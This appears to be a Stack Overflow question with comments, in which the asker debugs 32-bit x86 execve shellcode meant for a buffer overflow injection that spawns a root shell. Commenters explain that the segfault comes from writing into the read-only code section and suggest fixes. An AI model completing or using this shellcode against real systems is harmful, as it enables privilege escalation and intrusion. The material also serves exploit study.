# Segmentation fault in assembly code to call root

Tags: assembly, x86, shellcode

I'm trying to make assembly code to call a rootshell from my terminal that I can use in a buffer overflow injection attack, but right now I'm stuck on trying to get my assembly code to work, right now I'm getting a segmentation fault when I try to write into memory what's needed for a execve call.

The code is as follows

```
.code32
.text
.globl _start                            
_start:

        jmp MyCallStatement

        ShellCode:
        # Execve routine
                popl %esi
                xorl %eax, %eax
                movb %al, 0xe(%esi)
                movl %esi, 0xf(%esi)
                movl %eax, 0x13(%esi)
                movb $11, %al
                movl %esi, %ebx
                leal 0xf(%esi), %ecx
                leal 0x13(%esi), %edx
                int $0x80
        # Exit Routine  

        MyCallStatement:

                call ShellCode
                ShellVariable:
                        .ascii "/bin/rootshellABBBBCCCC"
```

So the idea here is that I have my rootcall injected with memory with other junk that will get overwritten.

The first movb at 0xe($esi), which is 14 bytes away overwrites the %esi with a 0 which is a null terminator to tell the code where my shell command string ends.

The next movb is simply one more byte away to load a pointer to where the second arg of execve which is the pointer that points to the beginning of %esi in memory

The final movl simply moves Nulls for the third arguement.

I'm getting a seg fault (core dump) and I'm not sure why.

Comment: Aren't you popping the return address (which will likely point somewhere in the code segment) and using it a base pointer?

Comment: @MargaretBloom  Yes, but the return address just happens to be `ShellVariable`.  But I think the next point you were going to make is that pages in the code segment tend to be readonly (in order to prevent accidental or malicious overwrites).  Writing to a readonly page can result in a seg fault.

Comment: @MargaretBloom popping it returns it to the beginning of the stack where my variable should be, right?

Comment: @DavidWohlferd, Yes that was my hidden hint :) To JCD, popping "returns" the return address that, as David pointed out, points to `ShellVariable`. But it is read-only.

Comment: @MargaretBloom so then how do you make something writable? is there a compilation flag or something you can run?

Comment: [This post](https://stackoverflow.com/questions/8794555/how-can-i-make-gcc-compile-the-text-section-as-writable-in-an-elf-binary) shows a few options. However, that would never happen in a real scenario.

Comment: Or you could not put your "data" in the "code" section.  Note that stack space is also writable...

Comment: @DavidWohlferd Would you recommend I add it above like where it says text?

Comment: Don't you need to terminate `shellVariable` with a NUL byte?

Comment: @fuz: yes, you do.  That might happen by chance in a stand-alone executable, but `.asciz` would be a much better choice.  Oh nvm, that's what the `xor`-zeroing and writing into the string is for.  (Hence the segfault.)

Comment: Whole lot easier to just use `push $imm32`, especially in 32-bit code.